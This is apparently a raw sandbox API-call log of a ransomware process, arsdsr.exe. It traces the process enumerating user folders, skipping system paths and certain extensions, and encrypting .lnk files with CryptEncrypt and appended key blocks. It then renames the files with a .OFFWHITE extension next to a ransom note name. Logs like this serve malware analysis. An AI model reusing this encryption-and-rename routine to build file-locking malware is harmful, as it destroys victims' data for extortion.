lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="...") returned 1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="windows") returned -1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="$recycle.bin") returned 1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="rsa") returned -1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat") returned -1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="programdata") returned -1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="appdata") returned 1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="program files") returned -1 [0152.601] lstrcmpiW (lpString1="Downloads.lnk", lpString2="program files (x86)") returned -1 [0152.601] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Links\\" | out: lpString1="C:/Users\\Default\\Links\\") returned="C:/Users\\Default\\Links\\" [0152.601] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\", lpString2="Downloads.lnk" | out: lpString1="C:/Users\\Default\\Links\\Downloads.lnk") returned="C:/Users\\Default\\Links\\Downloads.lnk" [0152.601] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.601] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.601] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0152.601] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0152.602] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0152.602] lstrcmpiW (lpString1="Downloads.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0152.602] GetProcessHeap () returned 0x500000 [0152.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526e08 [0152.602] CreateFileW (lpFileName="C:/Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0152.602] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=894) returned 1 [0152.602] GetProcessHeap () returned 0x500000 [0152.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0152.602] GetProcessHeap () returned 0x500000 [0152.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0152.602] GetProcessHeap () returned 0x500000 [0152.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0152.602] GetProcessHeap () returned 0x500000 [0152.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0152.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.602] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0152.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.602] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0152.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.602] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0152.603] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.603] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.603] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0152.603] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x37e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.603] SetLastError (dwErrCode=0x0) [0152.603] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.103] GetLastError () returned 0x0 [0153.103] GetLastError () returned 0x0 [0153.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x47e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.103] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x57e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.103] WriteFile (in: hFile=0xb0, lpBuffer=0x526e08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526e08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0153.103] GetProcessHeap () returned 0x500000 [0153.103] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x37e) returned 0x543e00 [0153.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.103] ReadFile (in: hFile=0xb0, lpBuffer=0x543e00, nNumberOfBytesToRead=0x37e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x543e00*, lpNumberOfBytesRead=0x295e540*=0x37e, lpOverlapped=0x0) returned 1 [0153.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.104] WriteFile (in: hFile=0xb0, lpBuffer=0x543e00*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x543e00*, lpNumberOfBytesWritten=0x295e54c*=0x37e, lpOverlapped=0x0) returned 1 [0153.104] GetProcessHeap () returned 0x500000 [0153.104] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543e00 | out: hHeap=0x500000) returned 1 [0153.104] CloseHandle (hObject=0xb0) returned 1 [0153.104] GetProcessHeap () returned 0x500000 [0153.104] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.104] GetProcessHeap () returned 0x500000 [0153.104] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.104] GetProcessHeap () returned 0x500000 [0153.104] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.104] GetProcessHeap () returned 0x500000 [0153.104] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.104] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Default\\Links\\Downloads.lnk" | out: lpString1="C:/Users\\Default\\Links\\Downloads.lnk") returned="C:/Users\\Default\\Links\\Downloads.lnk" [0153.104] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\Downloads.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\Links\\Downloads.lnk.OFFWHITE") returned="C:/Users\\Default\\Links\\Downloads.lnk.OFFWHITE" [0153.104] MoveFileW (lpExistingFileName="C:/Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), lpNewFileName="C:/Users\\Default\\Links\\Downloads.lnk.OFFWHITE" (normalized: "c:\\users\\default\\links\\downloads.lnk.offwhite")) returned 1 [0153.105] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2=".") returned 1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="..") returned 1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="...") returned 1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="windows") returned -1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="$recycle.bin") returned 1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="rsa") returned -1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat") returned 1 [0153.105] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="programdata") returned 1 [0153.106] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="appdata") returned 1 [0153.106] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="program files") returned 1 [0153.106] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="program files (x86)") returned 1 [0153.106] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Links\\" | out: lpString1="C:/Users\\Default\\Links\\") returned="C:/Users\\Default\\Links\\" [0153.106] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\", lpString2="RecentPlaces.lnk" | out: lpString1="C:/Users\\Default\\Links\\RecentPlaces.lnk") returned="C:/Users\\Default\\Links\\RecentPlaces.lnk" [0153.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.106] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.106] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0153.106] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0153.107] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0153.107] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0153.107] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0153.107] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0153.107] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0153.107] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0153.107] GetProcessHeap () returned 0x500000 [0153.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526e18 [0153.107] CreateFileW (lpFileName="C:/Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0153.110] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=363) returned 1 [0153.110] GetProcessHeap () returned 0x500000 [0153.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.110] GetProcessHeap () returned 0x500000 [0153.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.110] GetProcessHeap () returned 0x500000 [0153.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.110] GetProcessHeap () returned 0x500000 [0153.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.110] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.110] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.110] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.110] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.110] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.110] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.110] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.110] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.110] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.111] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.111] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.111] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.111] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.111] SetLastError (dwErrCode=0x0) [0153.111] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.112] GetLastError () returned 0x0 [0153.112] GetLastError () returned 0x0 [0153.113] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x26b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.113] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.113] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x36b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.113] WriteFile (in: hFile=0xb0, lpBuffer=0x526e18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526e18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0153.113] GetProcessHeap () returned 0x500000 [0153.113] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16b) returned 0x52ebe8 [0153.113] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.113] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x16b, lpOverlapped=0x0) returned 1 [0153.113] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.113] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x16b, lpOverlapped=0x0) returned 1 [0153.113] GetProcessHeap () returned 0x500000 [0153.113] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0153.113] CloseHandle (hObject=0xb0) returned 1 [0153.113] GetProcessHeap () returned 0x500000 [0153.114] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.114] GetProcessHeap () returned 0x500000 [0153.114] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.114] GetProcessHeap () returned 0x500000 [0153.114] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.114] GetProcessHeap () returned 0x500000 [0153.114] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.114] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Default\\Links\\RecentPlaces.lnk" | out: lpString1="C:/Users\\Default\\Links\\RecentPlaces.lnk") returned="C:/Users\\Default\\Links\\RecentPlaces.lnk" [0153.114] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\RecentPlaces.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\Links\\RecentPlaces.lnk.OFFWHITE") returned="C:/Users\\Default\\Links\\RecentPlaces.lnk.OFFWHITE" [0153.114] MoveFileW (lpExistingFileName="C:/Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), lpNewFileName="C:/Users\\Default\\Links\\RecentPlaces.lnk.OFFWHITE" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.offwhite")) returned 1 [0153.115] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0153.115] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.115] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="...") returned 1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="$recycle.bin") returned 1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="rsa") returned -1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="ntuser.dat") returned -1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="programdata") returned -1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="appdata") returned 1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="program files") returned -1 [0153.115] lstrcmpiW (lpString1="Local Settings", lpString2="program files (x86)") returned -1 [0153.115] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.115] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Local Settings" | out: lpString1="C:/Users\\Default\\Local Settings") returned="C:/Users\\Default\\Local Settings" [0153.115] lstrcatW (in: lpString1="C:/Users\\Default\\Local Settings", lpString2="\\" | out: lpString1="C:/Users\\Default\\Local Settings\\") returned="C:/Users\\Default\\Local Settings\\" [0153.115] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Local Settings\\" | out: lpString1="C:/Users\\Default\\Local Settings\\") returned="C:/Users\\Default\\Local Settings\\" [0153.115] lstrcatW (in: lpString1="C:/Users\\Default\\Local Settings\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Local Settings\\*.*") returned="C:/Users\\Default\\Local Settings\\*.*" [0153.115] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Local Settings\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0153.116] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Music", cAlternateFileName="")) returned 1 [0153.116] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="...") returned 1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="$recycle.bin") returned 1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="rsa") returned -1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="programdata") returned -1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="appdata") returned 1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="program files") returned -1 [0153.116] lstrcmpiW (lpString1="Music", lpString2="program files (x86)") returned -1 [0153.116] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.116] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Music" | out: lpString1="C:/Users\\Default\\Music") returned="C:/Users\\Default\\Music" [0153.116] lstrcatW (in: lpString1="C:/Users\\Default\\Music", lpString2="\\" | out: lpString1="C:/Users\\Default\\Music\\") returned="C:/Users\\Default\\Music\\" [0153.116] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Music\\" | out: lpString1="C:/Users\\Default\\Music\\") returned="C:/Users\\Default\\Music\\" [0153.116] lstrcatW (in: lpString1="C:/Users\\Default\\Music\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Music\\*.*") returned="C:/Users\\Default\\Music\\*.*" [0153.116] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Music\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.116] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.117] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.117] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.117] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.117] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.117] 